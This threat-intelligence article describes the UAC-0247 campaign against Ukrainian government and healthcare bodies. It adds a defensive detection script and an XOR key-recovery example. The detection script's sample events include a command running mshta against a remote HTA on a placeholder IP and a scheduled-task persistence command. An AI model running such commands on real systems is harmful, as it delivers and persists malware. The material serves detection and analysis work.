A cyberattack campaign tracked as UAC-0247 has been targeting local government bodies and municipal healthcare institutions across Ukraine since early 2026. The operators specifically aim to steal data from web browsers and WhatsApp, and they methodically expand their foothold within compromised networks.
The campaign opens with phishing emails that pose as correspondence about humanitarian aid and urge the recipient to click a link. To make the lure credible, the attackers either generate fake websites with the help of artificial intelligence or abuse Cross-Site Scripting (XSS) vulnerabilities on legitimate third-party sites, so that the link appears to point at a trusted domain. Clicking the link downloads an archive; opening it runs a shortcut (LNK) file, which causes mshta.exe to process a remote HTA file. The HTA keeps the victim occupied with decoy content while, in the background, an executable is dropped and launched through a scheduled task.
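The process chain just described (a shortcut handing a remote HTA to mshta.exe, followed by a scheduled task) leaves a recognisable trail in endpoint telemetry. The following is an added example, not CERT-UA tooling and not an indicator from the report: it runs two simple rules over a few constructed, Sysmon-style process-creation records. The paths, PIDs, IP address and task name are hypothetical.

```python
"""Flag the LNK -> remote HTA -> scheduled-task chain in process telemetry.

Added example, not CERT-UA tooling. The records below are constructed and
loosely modelled on Sysmon Event ID 1 fields; paths, PIDs, the IP address
and the task name are hypothetical.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterator, List, Tuple


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)
# Script hosts that should never be an ancestor of a task-creation call.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(ev: ProcEvent, by_pid: Dict[int, ProcEvent], max_depth: int = 4) -> Iterator[ProcEvent]:
    """Walk up the parent chain, at most max_depth hops."""
    cur = ev
    for _ in range(max_depth):
        cur = by_pid.get(cur.ppid)
        if cur is None:
            return
        yield cur


def detect(events: List[ProcEvent]) -> List[Tuple[str, int]]:
    """Return (rule name, pid) for every event that matches a rule."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        name = basename(ev.image)
        # Rule 1: mshta.exe handed a URL, i.e. a remote HTA is being processed.
        if name == "mshta.exe" and REMOTE_URL.search(ev.cmdline):
            findings.append(("mshta_remote_hta", ev.pid))
        # Rule 2: schtasks /create whose ancestry contains a script host.
        if name == "schtasks.exe" and re.search(r"/create\b", ev.cmdline, re.IGNORECASE):
            if any(basename(a.image) in SCRIPT_HOSTS for a in ancestors(ev, by_pid)):
                findings.append(("schtasks_from_script_host", ev.pid))
    return findings


# Constructed sample: explorer launches the LNK target (cmd -> mshta -> schtasks),
# followed by two benign events that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(1000, 4, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1100, 1000, r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c start "" mshta http://203.0.113.10/aid/view.hta'),
    ProcEvent(1200, 1100, r"C:\Windows\System32\mshta.exe",
              "mshta http://203.0.113.10/aid/view.hta"),
    ProcEvent(1300, 1200, r"C:\Windows\System32\schtasks.exe",
              r'schtasks /create /sc minute /mo 5 /tn "Updater" /tr "C:\Users\u\AppData\Roaming\svc.exe" /f'),
    ProcEvent(2000, 1000, r"C:\Windows\System32\mshta.exe",
              r'mshta "C:\Program Files\Vendor\help.hta"'),
    ProcEvent(2100, 1000, r"C:\Windows\System32\schtasks.exe",
              "schtasks /query /tn Backup"),
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

Rule 1 is deliberately narrow (mshta with a URL on its command line); a locally stored decoy HTA would need a second rule keyed on the archive or LNK parent. Rule 2 walks a few hops up the parent chain rather than checking only the direct parent, since the HTA may go through cmd.exe or powershell.exe before calling schtasks.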
CERT-UA analysts documented this activity as part of a notable surge in cyberattacks observed during March and April 2026. The same threat cluster has also been linked to attacks on elements of Ukraine’s Defense Forces and on FPV drone operators. For instance, on March 10, 2026, an archive named “bachu.zip” was distributed via the Signal messenger, masquerading as an updated version of the “BACHU” software used by FPV operators. The archive contained a DLL that the legitimate main program side-loads on start-up, and that DLL in turn launches the AGINGFLY malware.
Inside the UAC-0247 Campaign: Data Theft and Network Expansion
Analysis of the numerous incidents attributed to this campaign shows a consistent pattern of data exfiltration and network reconnaissance. The attackers use CHROMELEVATOR to extract authentication data and stored credentials from web browsers, and a separate tool, ZAPIXDESK, to steal data from WhatsApp.
In parallel with the data theft, the threat actors map internal networks using simple subnet scanners and the publicly available RUSTSCAN tool. In some incidents the LIGOLO-NG and CHISEL tools were deployed to establish covert network tunnels. One incident also involved the XMRIG cryptocurrency miner, packaged as a DLL and loaded by a tampered copy of the legitimate WIREGUARD program.
The AGINGFLY Malware and Persistent Footholds
The primary remote access tool used throughout the campaign is AGINGFLY, a malware written in C# that offers full remote control: command execution, file download, screenshot capture, keylogging, and in-memory code execution.
A notable characteristic of AGINGFLY is how it handles commands. Rather than embedding the command handlers in the binary, it downloads them as source code from the command-and-control (C2) server and compiles them on the infected host, so static analysis of the implant alone does not reveal its full command set. C2 communication runs over WebSockets, with all traffic encrypted using AES-CBC under a static key; because the key is fixed, an analyst who extracts it from one sample can decrypt captured traffic from any infection using that build.
For persistent access the campaign also uses a PowerShell script known as SILENTLOOP. The script automates command execution, updates its own configuration, and retrieves the current C2 server IP address from a designated Telegram channel. It includes fallback mechanisms for locating the C2 address should the Telegram source become unavailable.
Initial access is typically established through either a plain TCP reverse shell or RAVENSHELL, which encrypts its TCP connection with a 9-byte XOR key and gives the management server a cmd.exe session over that channel.

CERT-UA recommends that organizations reduce their exposure by restricting the execution of LNK, HTA, and JS files on endpoints, and by limiting the use of legitimate utilities that the campaign actively abuses, such as mshta.exe, powershell.exe, and wscript.exe. These restrictions are standard attack surface reduction measures available through built-in operating system controls (for example, Windows AppLocker or WDAC policies, or re-associating those file types with a harmless handler) and do not require third-party tools.
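The 9-byte XOR key used by RAVENSHELL deserves a closer look, because a short static XOR key can be recovered from a single traffic capture. The block below is an added example, not CERT-UA's code and not the malware's. It assumes the key is applied as a repeating keystream over the TCP payload (the report only states the key length) and that the operator ran `ver`, so the cmd.exe banner is present somewhere in the stream as known plaintext. The session, key, host name, user and build string are all constructed. The code slides the crib along the ciphertext, keeps only offsets where every implied key byte agrees, and then decrypts the whole stream.

```python
"""Recover a 9-byte repeating XOR key from a captured RAVENSHELL-style stream.

Added example, not CERT-UA code and not the malware itself. Assumptions:
the 9-byte key is applied as a repeating keystream over the TCP payload,
and the operator ran `ver`, so the cmd.exe banner appears somewhere in the
server-to-client data. Key, host name, user and build string are constructed.
"""
from typing import List, Optional, Tuple

KEY_LEN = 9
# Known plaintext: the first bytes of cmd.exe's `ver` output.
CRIB = b"Microsoft Windows [Version "


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def crib_candidates(ct: bytes, crib: bytes = CRIB, key_len: int = KEY_LEN) -> List[Tuple[int, bytes]]:
    """Slide the crib along the ciphertext. Because the crib is longer than the
    key, every key slot is implied more than once; keep only offsets where all
    implied values agree."""
    out = []
    for off in range(len(ct) - len(crib) + 1):
        key: List[Optional[int]] = [None] * key_len
        consistent = True
        for j, p in enumerate(crib):
            slot = (off + j) % key_len
            k = ct[off + j] ^ p
            if key[slot] is None:
                key[slot] = k
            elif key[slot] != k:
                consistent = False
                break
        if consistent and None not in key:
            out.append((off, bytes(key)))
    return out


def recover_key(ct: bytes, crib: bytes = CRIB, key_len: int = KEY_LEN) -> bytes:
    """Return the single key implied by the crib, or raise if ambiguous."""
    cands = crib_candidates(ct, crib, key_len)
    if len(cands) != 1:
        raise ValueError(f"expected exactly one consistent crib offset, got {len(cands)}")
    return cands[0][1]


# Constructed session: what the operator would see, XORed with a constructed key.
KEY = bytes.fromhex("4d1b7a9e02c3f6518b")
PLAINTEXT = (
    b"C:\\Users\\u>ver\r\n\r\n"
    b"Microsoft Windows [Version 10.0.19045.4046]\r\n\r\n"
    b"C:\\Users\\u>whoami\r\nws01\\u\r\n\r\nC:\\Users\\u>"
)
CAPTURE = xor_repeating(PLAINTEXT, KEY)


def analyse(capture: bytes = CAPTURE) -> Tuple[bytes, bytes]:
    """Return (recovered key, decrypted stream) for a capture."""
    key = recover_key(capture)
    return key, xor_repeating(capture, key)


if __name__ == "__main__":
    key, plain = analyse()
    print("recovered key:", key.hex())
    print(plain.decode("ascii"))
```

If no banner is available, the same key can usually be recovered by per-position frequency analysis, since cmd.exe output is mostly printable ASCII with a heavy bias toward spaces and letters in each of the nine key columns. None of this applies to AGINGFLY's AES-CBC channel, where the static key has to come from the sample rather than from the traffic.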
Given the ongoing nature of the UAC-0247 campaign, continued targeting of Ukrainian healthcare and government entities should be expected. The combination of established tradecraft and new malware components points to a persistent and evolving threat, and organizations in the affected sectors should keep their detection and hardening measures current.